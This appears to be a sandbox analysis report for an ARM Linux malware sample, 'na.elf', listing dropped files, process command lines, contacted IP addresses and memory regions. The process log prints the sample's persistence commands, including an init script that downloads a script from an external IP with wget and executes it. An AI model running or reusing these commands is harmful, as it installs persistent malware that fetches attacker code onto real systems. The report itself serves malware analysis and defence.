Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
na.elf
|
ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
|
initial sample
|
||
/etc/init.d/mybinary
|
POSIX shell script, ASCII text executable
|
dropped
|
||
/etc/init.d/na.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
||
/etc/profile
|
ASCII text
|
dropped
|
||
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
||
/boot/bootcmd
|
ASCII text
|
dropped
|
||
/etc/inittab
|
ASCII text
|
dropped
|
||
/etc/motd
|
ASCII text
|
dropped
|
||
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
/tmp/qemu-open.d1Mlmt (deleted)
|
data
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
/usr/bin/dash
|
-
|
||
/usr/bin/rm
|
rm -f /tmp/tmp.X4LvdcPchc /tmp/tmp.hrDZxt4n4J /tmp/tmp.SKR6rNNjpj
|
||
/usr/bin/dash
|
-
|
||
/usr/bin/rm
|
rm -f /tmp/tmp.X4LvdcPchc /tmp/tmp.hrDZxt4n4J /tmp/tmp.SKR6rNNjpj
|
||
/tmp/na.elf
|
/tmp/na.elf
|
||
/tmp/na.elf
|
-
|
||
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
/tmp/na.elf
|
-
|
||
/bin/sh
|
sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/chmod
|
chmod +x /etc/init.d/mybinary
|
||
/tmp/na.elf
|
-
|
||
/bin/sh
|
sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/ln
|
ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
|
||
/tmp/na.elf
|
-
|
||
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/na.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting na.elf'\n /tmp/na.elf
&\n wget http://154.216.19.140/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo
'Stopping na.elf'\n killall na.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0
{start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/na.elf"
|
||
/tmp/na.elf
|
-
|
||
/bin/sh
|
sh -c "chmod +x /etc/init.d/na.elf >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/chmod
|
chmod +x /etc/init.d/na.elf
|
||
/tmp/na.elf
|
-
|
||
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
/tmp/na.elf
|
-
|
||
/bin/sh
|
sh -c "ln -s /etc/init.d/na.elf /etc/rc.d/S99na.elf >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/ln
|
ln -s /etc/init.d/na.elf /etc/rc.d/S99na.elf
|
||
/tmp/na.elf
|
-
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/systemd/systemd
|
-
|
||
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
There are 28 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://154.216.19.140/
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
154.216.19.139
|
unknown
|
Seychelles
|
||
87.120.84.105
|
unknown
|
Bulgaria
|
||
185.170.144.84
|
unknown
|
unknown
|
||
109.202.202.202
|
unknown
|
Switzerland
|
||
91.189.91.43
|
unknown
|
United Kingdom
|
||
193.143.1.59
|
unknown
|
unknown
|
||
91.189.91.42
|
unknown
|
United Kingdom
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
55ac09cee000
|
page read and write
|
|||
7f305c039000
|
page read and write
|
|||
7f3161f0d000
|
page read and write
|
|||
7f316284b000
|
page read and write
|
|||
55ac07cd0000
|
page read and write
|
|||
55ac09cd7000
|
page execute and read and write
|
|||
7f3162a2c000
|
page read and write
|
|||
7f305c02c000
|
page execute read
|
|||
7ffe59879000
|
page read and write
|
|||
7f3161e7b000
|
page read and write
|
|||
7f3162b79000
|
page read and write
|
|||
7f3162669000
|
page read and write
|
|||
7f315bfff000
|
page read and write
|
|||
7ffe598a5000
|
page execute read
|
|||
7f3162b55000
|
page read and write
|
|||
7f315c021000
|
page read and write
|
|||
55ac07a7f000
|
page execute read
|
|||
7f305c035000
|
page read and write
|
|||
7f3162bbe000
|
page read and write
|
|||
7f31624fd000
|
page read and write
|
|||
7f3161673000
|
page read and write
|
|||
7f31624da000
|
page read and write
|
|||
55ac0a8a1000
|
page read and write
|
|||
7f316226f000
|
page read and write
|
|||
55ac07cd9000
|
page read and write
|
There are 15 hidden memdumps, click here to show them.